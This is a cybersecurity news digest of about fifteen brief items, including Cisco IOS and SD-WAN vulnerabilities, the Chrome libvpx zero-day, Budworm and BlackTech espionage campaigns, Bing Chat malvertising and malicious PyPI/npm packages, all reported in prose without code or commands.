Daily Brief

Cisco has issued an advisory detailing a medium-severity security flaw in its IOS and IOS XE software that has been targeted by attackers. The vulnerability, identified as CVE-2023-20109, originates from inadequate attribute validation within the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols of the GET VPN feature. Successful exploitation requires attackers to have administrative control of a key server or group member, implying they have already infiltrated the network. An attacker could execute arbitrary code and gain full control of the affected system or cause it to reload, creating a denial-of-service (DoS) condition. The zero-day vulnerability impacts all Cisco products running affected IOS or IOS XE software with GDOI or G-IKEv2 protocol enabled. Meraki products, and those running IOS XR or NX-OS software, are not exposed to attacks using this exploit. Despite the considerable access required, Cisco has already noted attempted exploitations of the vulnerability. Cisco also addressed a critical flaw in the Security Assertion Markup Language (SAML) APIs of Catalyst SD-WAN Manager network management software, that could enable unauthenticated attackers to remotely gain unauthorized access to the application.

DARPA has performed an initial test dip of a prototype unmanned undersea vehicle (UUV) with PacMar Technologies and Northrop Grumman. Both these companies are developing prototypes for DARPA's Manta Ray program, which aims to enhance America's next-generation undersea power projection capabilities. The test sought to gain insights into key systems of the vehicle, validate assumptions and models, and extract valuable data in preparation for upcoming full-scale at-sea demonstrations. The Manta Ray program focuses on creating a craft that can operate for extended durations without logistic support or maintenance. DARPA intends for these crafts to be able to harvest energy at relevant operational depths, leverage ocean wave energy, current energy, and ocean thermal energy. Future improvements to the prototype will include new approaches to mitigate biofouling, corrosion, and other material degradation for long-duration missions.

Microsoft's AI-powered Bing Chat was found to be infiltrated by malware, through malicious advertisements that promote fake download sites. Bing Chat, introduced by Microsoft in 2023 to compete with Google, incorporates ads into the chat to generate additional revenue. However, this has opened up opportunities for cybercriminals to use these ads to distribute malware. Scams observed include fake download sites pretending to offer popular utilities, such as 'Advanced IP Scanner' which has been previously used by RomCom RAT and Somnia ransomware operators. The malware attack uses ad accounts of legitimate businesses to create sponsored links, which direct users to websites aiming to deploy malware. After verifying the user is a human, the victims are redirected to a replica site, tricking them into downloading a malicious script. Cybercriminals are exploiting the trust-based interaction Bing Chat offers, as unwarranted trust may lead users to click on these ads, judge promoted content as reliable and fail to double-check URLs. Despite the specifics of malwares being unclear, prior similar operations showed that threat actors often distribute information-stealing malwares or deploy remote access trojans for potential account and network breaches.

The FBI has reported a new trend in ransomware attacks where multiple malware types are employed within a 48-hour period, contrasting with a typical minimum of 10 days between such attacks. Ransomware affiliates are said to be using two distinct variants, causing a mix of data encryption, loss, and significant financial losses from ransom payments. Variants including AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal have been reported, leading to increased harm to targeted entities. Alongside this trend, ransomware gangs have been developing code to avoid detection by incorporating new code within their custom data theft tools, wipers and malware. The FBI has recommended maintaining close connections with their Field Offices, applying mitigation measures outlined in their recent Private Industry Notification, and conducting thorough scans of infrastructures for potential backdoors and vulnerabilities. Other recommendations include securing all remote access solutions via VPN, enforcing multi-factor authentication, implementing network segmentation to isolate critical servers, and identifying patch-vulnerable devices via network-wide audits and scans.

Cisco has issued a warning regarding five new vulnerabilities identified in its Catalyst SD-WAN Manager products; the most critical one allows unauthorized remote access to servers. The most severe vulnerability (CVE-2023-20252), scored 9.8 out of 10 by the Common Vulnerability Scoring System (CVSS), is due to issues with the Security Assertion Markup Language (SAML) application programming interfaces (APIs). It can be exploited by sending special requests to the SAML APIs, generating authorization tokens and gaining unconditional application access. The vulnerability opens up the potential for user impersonation, unauthorized data access/modification/deletion, and service disruption. The remaining vulnerabilities are less severe; CVE-2023-20034 is remotely exploitable without requiring authentication but its severity is minimized as the access is limited to the Elasticsearch database. The flaws impact various versions of Cisco Catalyst SD-WAN Manager; the most crucial one to fix, CVE-2023-20252, affects versions 20.9.3.2 and 20.11.1.2. The latest available version, Catalyst SD-WAN Manager 20.12, is the safest to upgrade to. Cisco has advised that there are no workarounds available for these fixed flaws, and the only recommended action is to upgrade to a patched release. Currently, there are no reports of these flaws being actively exploited, but Cisco urged customers to upgrade to the recommended versions urgently.

Sam Curry, a security researcher, was detained and investigated by US border officials and federal agents after his IP address was detected in a cryptocurrency wallet associated with a phishing scam. A grand jury subpoena was issued and Curry's devices were searched at Dulles International Airport when he returned from Japan. The suspect wallet was linked to a scam Curry had been involved in investigating in his professional capacity. After several days of engagement and clarification by his lawyer, the subpoena was dismissed and all data seized from Curry's devices were deleted. Curry is a significant player in the security field, having discovered and reported flaws in the APIs of major car companies and airline reward programs. His experience raises awareness about the fact that merely being a security researcher does not exempt one from the scrutiny of law enforcement should one's IP or system fingerprint be found in assets related to criminal activity. BleepingComputer reports that their inquiries to DHS, CBP, and IRS CI received no response at the time of publishing.

A Chinese hacker group known as Budworm has been found to be targeting a telecommunications firm in the Middle East and a government entity in Asia with its custom malware, SysUpdate. SysUpdate is a remote access trojan that performs various functions such as process management, data retrieval, screenshot capturing, and command execution. The newest variant of the backdoor was detected in August 2023, and is launched via DLL sideloading, thereby evading detection by security tools on the target host. The attackers also use several publicly available tools for credential dumping, network mapping, and data theft. This incident falls within a recurrent trend of telecom companies being targeted by state-sponsored and APT hacking groups. The Budworm hacking group has been active since 2013, engaging in various cybercrimes targeting sectors such as government, technology, and defense. Previous attacks by Budworm include supply chain attacks in Germany, targeting several online gaming and gambling companies, and multiple ministries in Belgium.

Taiwanese group BlackTech, linked to the Chinese government, has reportedly exploited routers to launch attacks on US and Japanese companies. The group manipulates router firmware, allowing it to access corporate networks through international subsidiaries, primarily focusing on targets in Japan and the United States. BlackTech has been identified by various entities including the National Security Agency (NSA), Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC), among others. The sectors targeted include government and military departments, as well as industries such as technology, media, electronics, telecommunications and more in the US and Japan. Since 2007, BlackTech has performed covert operations against targets in East Asia and shows capabilities of operating undetected. The group uses backdoors for a range of attacks and is known for exploiting vulnerable routers for use as command-and-control (C&C) servers. BlackTech's typical attack mode involves spear-phishing emails with malicious attachments that deploy malware designed to extract sensitive data. The group also uses advanced evasion techniques, such as leveraging stolen code-signing certificates and other living-off-the-land (LotL) techniques, for long-term stealth operations. To counter these threats, companies are advised to monitor network devices for unauthorized downloads of bootloaders and firmware images, as well as detect and investigate anomalous traffic to routers.

Google's chatbot, Bard, which was given the capability to share conversations with unique public links in July, has had these links indexed by Google Search, making them readily discoverable. While Google suggests these public links can be removed, they persist in its own search service, even as the shared links are designed to automatically expire in six months. Although these chat records do not contain personal information, users may not be aware that their shared links can feature in Google Search results. This new concern with Bard adds to Google's series of previous privacy issues, including settlements linked to biometrics, location data, and tracking claims. Google acknowledged that its search service may be capturing too much data and is reportedly working on a solution to prevent the indexing of shared Bard chats.

The Budworm threat actor group, linked with China, has launched new attacks on a Middle Eastern telecom company and an Asian government using its updated SysUpdate malware. The group is also known as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, and has been active since 2013. It aims to gather intelligence from various industries. Budworm uses a variety of malware, including China Chopper web shell, Gh0st RAT, HyperBro, PlugX, SysUpdate, and ZXShell for its operations. It has been known to exploit vulnerable internet-facing services to access targeted networks. The Linux version of SysUpdate was detailed by Trend Micro, describing its ability to bypass security measures and resist reverse engineering. Its features include screenshots capture, arbitrary process termination, file operations, drive information retrieval, and command execution. Although the malware is feature-rich, Symantec says that the group's activity was potentially stopped early in the attack chain since they only observed credential harvesting in infected machines. Symantec also noted that Budworm continuously develops SysUpdate to enhance its capacities and evade detection. They use a unique methodology, including DLL side-loading using previously utilized applications. This highlights the group's confidence in using the known malware despite potential detection and attribution risks.

Traditional browser isolation, once considered an excellent method to ward off malware and browser exploits, is no longer seen as secure enough, especially in a software as a service (SaaS) dominated ecosystem. The approach's weaknesses include its impact on browser performance and inability to fend off newer web threats like phishing and harmful extensions. Historically, browser isolation allowed unknown code to execute in a separate environment, not directly on the endpoint, protecting devices and users against potentially malicious code. The shift to a more browser and SaaS-dependent workspace has amplified the negative impact of traditional browser isolation on the performance of web tools and services. Evolving web threats and their changing nature have outpaced browser isolation techniques, causing a security gap. The next generation of browser security is turning towards secure browser extensions, which can integrate seamlessly into existing browsers, monitor and analyse web page components, and effectively neutralize threats with minimal impact on performance.

Minister for National Security of China, Chen Yixin, has identified network security incidents, including the spread of fake news and cyberattacks, as the most significant digital threats to China. In an article for China Cyberspace, the official magazine of the Cyberspace Administration of China, Chen also blamed international competition in cyberspace as a key competitive challenge for China. Chen took issue with foreign technology alliances allegedly aimed at excluding China, accusing them of being motivated by intentions to monopolize technology leadership rather than genuine security concerns. Chen noted China's technological weakness lies in the control exerted by other nations over core technologies and stated that China cannot yet match the quality of offshore tech providers. Cyberattacks on Chinese infrastructure and theft of data from government and scientific research institutions were cited as additional threats to the nation's security. Moving forward, Chen advocated following party lines, making progress in sectors such as quantum computing, and improving IT governance and security to confront these challenges. These comments coincide with China's continued emphasis on boosting its digital capabilities and improving controls over online activities.

Google has rolled out fixes to address a high-severity, actively exploited zero-day vulnerability (CVE-2023-5217) in the Chrome browser. The vulnerability could result in program crashes or arbitrary code execution. The flaw, discovered by Clément Lecigne of Google's Threat Analysis Group, resides in libvpx, a free software video codec library, and involves a heap-based buffer overflow in the VP8 compression format. The bug reportedly has been exploited by a commercial spyware vendor targeting high-risk individuals. The discovery brings the total of patched zero-day vulnerabilities in Google Chrome this year to five. Google issued a new CVE identifier (CVE-2023-5129) for a critical flaw in the libwebp image library, which is under active cyber attacks in the wild. Users of Chrome and Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are advised to upgrade to the latest browser versions to mitigate potential threats.

Google has addressed its fifth Chrome zero-day vulnerability, CVE-2023-5217, which has been actively exploited in attacks since the beginning of the year. The fix is currently rolling out to users globally. The high risk vulnerability is caused by a heap buffer overflow weakness in the VP8 encoding of the open-source libvpx video codec library, potentially leading to app crashes or arbitrary code execution. Google's Threat Analysis Group (TAG) reported the bug. TAG researchers often uncover and report zero-day exploits commonly used in targeted spyware attacks perpetrated by state-sponsored threat groups. While Google confirmed that the CVE-2023-5217 exploit had been used in attacks, further information regarding these incidents has not been disclosed. By restricting access to bug details and maintaining restrictions on bugs that exist in third party libraries that other projects rely on but have not yet fixed, Google ensures its users have ample time to update their browsers, defending against potential attacks. Due to Google's commitment to proactively addressing these security vulnerabilities, the risk of threat actors creating custom exploits and deploying them in real-world scenarios is diminished.

Malicious PyPI and npm packages have been discovered systematically stealing software developers' sensitive data since September 12, 2023. The cybersecurity firm Sonatype initially identified the attacks with 14 malicious packages on npm. Cybersecurity company Phylum later reported the campaign had expanded to the PyPI ecosystem. To date, attackers have launched roughly seven attack waves and uploaded 45 malicious packages on npm and PyPI; the latter are undergoing rapid variations for better stealth and specific targeting. Middle and later stages of the attack implemented more complex data collection mechanisms, such as retrieving and executing data-collecting bash script from an external domain, and using base64 encoding, later double base64 encoding, to evade analysis. Stolen data includes items like hostname, username, current path, OS version, external and internal IP addresses, and Python version for PyPI packages, as well as information stored in Kubernetes configurations, and SSH private keys. The stolen data could expose developer identities, grant attackers unauthorized system access, or enable modifications to deployments, addition of malicious containers, and potential launching of ransomware attacks. Users of code distribution platforms PyPI and npm are urged to exercise caution when downloading and launching packages due to the constant influx of malware.